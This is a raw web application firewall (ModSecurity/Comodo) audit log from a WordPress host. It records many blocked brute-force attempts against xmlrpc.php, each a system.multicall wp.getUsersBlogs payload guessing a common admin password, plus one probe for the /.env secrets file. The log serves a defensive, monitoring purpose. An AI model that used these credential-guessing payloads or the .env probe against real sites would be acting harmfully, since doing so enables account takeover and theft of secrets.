matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 139.59.17.212 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749108304556183 5719 (- - -) Stopwatch2: 1749108304556183 5719; combined=4048, p1=496, p2=3387, p3=0, p4=0, p5=98, sr=88, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d74f2468-Z-- --a3488b03-A-- [05/Jun/2025:14:25:36 +0700] aEFGcCrHpfaS2Cuwh8XVlQAAAE8 103.236.140.4 39492 103.236.140.4 8181 --a3488b03-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.53.96.142 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.53.96.142 X-Forwarded-Proto: https Connection: close Content-Length: 490 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --a3488b03-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin[_host_]2021 --a3488b03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3488b03-E-- --a3488b03-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.53.96.142 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749108336359519 31580 (- - -) Stopwatch2: 1749108336359519 31580; combined=57683, p1=369, p2=2190, p3=0, p4=0, p5=27572, sr=69, sw=56, l=0, gc=27496 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3488b03-Z-- --e64a5154-A-- [05/Jun/2025:14:26:26 +0700] aEFGon-K7ToMdu-YSIIlrgAAAAQ 103.236.140.4 39520 103.236.140.4 8181 --e64a5154-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.18.250.175 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.18.250.175 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --e64a5154-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin95 --e64a5154-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e64a5154-E-- --e64a5154-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.18.250.175 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749108386116493 5214 (- - -) Stopwatch2: 1749108386116493 5214; combined=3818, p1=444, p2=3201, p3=0, p4=0, p5=102, sr=88, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e64a5154-Z-- --d7fcc206-A-- [05/Jun/2025:14:27:33 +0700] aEFG5SrHpfaS2Cuwh8XVpAAAAE0 103.236.140.4 39574 103.236.140.4 8181 --d7fcc206-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 139.59.17.212 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 139.59.17.212 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --d7fcc206-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin85 --d7fcc206-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7fcc206-E-- --d7fcc206-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 139.59.17.212 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749108453152202 6149 (- - -) Stopwatch2: 1749108453152202 6149; combined=4364, p1=521, p2=3671, p3=0, p4=0, p5=102, sr=92, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7fcc206-Z-- --5f14860d-A-- [05/Jun/2025:14:27:40 +0700] aEFG7FwdJdhOudw5hdzQLAAAAIg 103.236.140.4 39584 103.236.140.4 8181 --5f14860d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.18.250.175 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.18.250.175 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5f14860d-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin1979 --5f14860d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f14860d-E-- --5f14860d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.18.250.175 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749108460765969 6016 (- - -) Stopwatch2: 1749108460765969 6016; combined=4327, p1=555, p2=3596, p3=0, p4=0, p5=104, sr=106, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f14860d-Z-- --b9b65639-A-- [05/Jun/2025:14:30:23 +0700] aEFHj1wdJdhOudw5hdzQOwAAAIw 103.236.140.4 39630 103.236.140.4 8181 --b9b65639-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.18.250.175 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.18.250.175 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --b9b65639-C-- system.multicallmethodNamewp.getUsersBlogsparamsjaninepassword --b9b65639-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b9b65639-E-- --b9b65639-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.18.250.175 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749108623497717 4987 (- - -) Stopwatch2: 1749108623497717 4987; combined=3765, p1=391, p2=3184, p3=0, p4=0, p5=113, sr=77, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b9b65639-Z-- --7557610a-A-- [05/Jun/2025:14:35:00 +0700] aEFIpFwdJdhOudw5hdzQVgAAAIU 103.236.140.4 39776 103.236.140.4 8181 --7557610a-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.53.96.142 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.53.96.142 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --7557610a-C-- system.multicallmethodNamewp.getUsersBlogsparamsadmina123456 --7557610a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7557610a-E-- --7557610a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.53.96.142 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749108900861992 5842 (- - -) Stopwatch2: 1749108900861992 5842; combined=4057, p1=536, p2=3349, p3=0, p4=0, p5=101, sr=104, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7557610a-Z-- --913a9a55-A-- [05/Jun/2025:14:39:05 +0700] aEFJmSrHpfaS2Cuwh8XVxAAAAFg 103.236.140.4 39854 103.236.140.4 8181 --913a9a55-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.18.250.175 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.18.250.175 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --913a9a55-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminADMIN[_host_] --913a9a55-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --913a9a55-E-- --913a9a55-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.18.250.175 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749109145891112 5870 (- - -) Stopwatch2: 1749109145891112 5870; combined=4167, p1=514, p2=3480, p3=0, p4=0, p5=101, sr=91, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --913a9a55-Z-- --e39bde11-A-- [05/Jun/2025:14:42:42 +0700] aEFKcirHpfaS2Cuwh8XV2gAAAEU 103.236.140.4 39932 103.236.140.4 8181 --e39bde11-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.53.96.142 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.53.96.142 X-Forwarded-Proto: https Connection: close Content-Length: 479 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --e39bde11-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh$ --e39bde11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e39bde11-E-- --e39bde11-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.53.96.142 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749109362251433 4485 (- - -) Stopwatch2: 1749109362251433 4485; combined=3503, p1=363, p2=2974, p3=0, p4=0, p5=96, sr=73, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e39bde11-Z-- --9219b26d-A-- [05/Jun/2025:14:43:39 +0700] aEFKqyrHpfaS2Cuwh8XV4wAAAFI 103.236.140.4 39958 103.236.140.4 8181 --9219b26d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.29 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.29 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; POCO F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 Accept-Charset: utf-8 --9219b26d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9219b26d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749109419355854 696 (- - -) Stopwatch2: 1749109419355854 696; combined=293, p1=237, p2=0, p3=0, p4=0, p5=55, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9219b26d-Z-- --830c5b75-A-- [05/Jun/2025:15:08:20 +0700] aEFQdH-K7ToMdu-YSIImBwAAAA8 103.236.140.4 40530 103.236.140.4 8181 --830c5b75-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 216.10.249.85 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 216.10.249.85 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --830c5b75-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehAdmin@12345 --830c5b75-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --830c5b75-E-- --830c5b75-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 216.10.249.85 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749110900809973 5049 (- - -) Stopwatch2: 1749110900809973 5049; combined=3929, p1=511, p2=3252, p3=0, p4=0, p5=98, sr=148, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --830c5b75-Z-- --f7a8a83c-A-- [05/Jun/2025:15:10:58 +0700] aEFREuth7G2xELALzPYkKwAAAMM 103.236.140.4 40630 103.236.140.4 8181 --f7a8a83c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 216.10.249.85 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 216.10.249.85 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --f7a8a83c-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehAdmin123! --f7a8a83c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f7a8a83c-E-- --f7a8a83c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 216.10.249.85 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749111058671479 4919 (- - -) Stopwatch2: 1749111058671479 4919; combined=3704, p1=419, p2=3118, p3=0, p4=0, p5=98, sr=86, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f7a8a83c-Z-- --86ea907a-A-- [05/Jun/2025:15:13:19 +0700] aEFRnyrHpfaS2Cuwh8XWdwAAAEk 103.236.140.4 40696 103.236.140.4 8181 --86ea907a-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.78.115.243 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.78.115.243 X-Forwarded-Proto: https Connection: close Content-Length: 479 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --86ea907a-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehantix2 --86ea907a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --86ea907a-E-- --86ea907a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.78.115.243 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749111199613533 4806 (- - -) Stopwatch2: 1749111199613533 4806; combined=3610, p1=377, p2=3059, p3=0, p4=0, p5=103, sr=78, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86ea907a-Z-- --5e6a1c40-A-- [05/Jun/2025:15:14:33 +0700] aEFR6SrHpfaS2Cuwh8XWegAAAEs 103.236.140.4 40716 103.236.140.4 8181 --5e6a1c40-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.204.239.125 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.204.239.125 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5e6a1c40-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminP@ssword --5e6a1c40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e6a1c40-E-- --5e6a1c40-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.204.239.125 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749111273555198 5856 (- - -) Stopwatch2: 1749111273555198 5856; combined=4152, p1=509, p2=3476, p3=0, p4=0, p5=99, sr=96, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e6a1c40-Z-- --8fdf1229-A-- [05/Jun/2025:15:17:14 +0700] aEFSiirHpfaS2Cuwh8XWhwAAAEE 103.236.140.4 40778 103.236.140.4 8181 --8fdf1229-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 101.100.220.131 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 101.100.220.131 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --8fdf1229-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehz43218765z --8fdf1229-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8fdf1229-E-- --8fdf1229-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 101.100.220.131 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749111434466586 4600 (- - -) Stopwatch2: 1749111434466586 4600; combined=3513, p1=388, p2=2967, p3=0, p4=0, p5=92, sr=80, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8fdf1229-Z-- --1c1a7f30-A-- [05/Jun/2025:15:21:02 +0700] aEFTblwdJdhOudw5hdzQlwAAAIc 103.236.140.4 40876 103.236.140.4 8181 --1c1a7f30-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 101.100.220.131 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 101.100.220.131 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --1c1a7f30-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix001 --1c1a7f30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c1a7f30-E-- --1c1a7f30-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 101.100.220.131 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749111662707449 5624 (- - -) Stopwatch2: 1749111662707449 5624; combined=3974, p1=497, p2=3302, p3=0, p4=0, p5=103, sr=94, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c1a7f30-Z-- --09bf297a-A-- [05/Jun/2025:15:25:29 +0700] aEFUeVwdJdhOudw5hdzQtQAAAIQ 103.236.140.4 41528 103.236.140.4 8181 --09bf297a-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 175.117.144.122 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 175.117.144.122 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --09bf297a-C-- system.multicallmethodNamewp.getUsersBlogsparamswordpressw0rdpr3ss --09bf297a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --09bf297a-E-- --09bf297a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
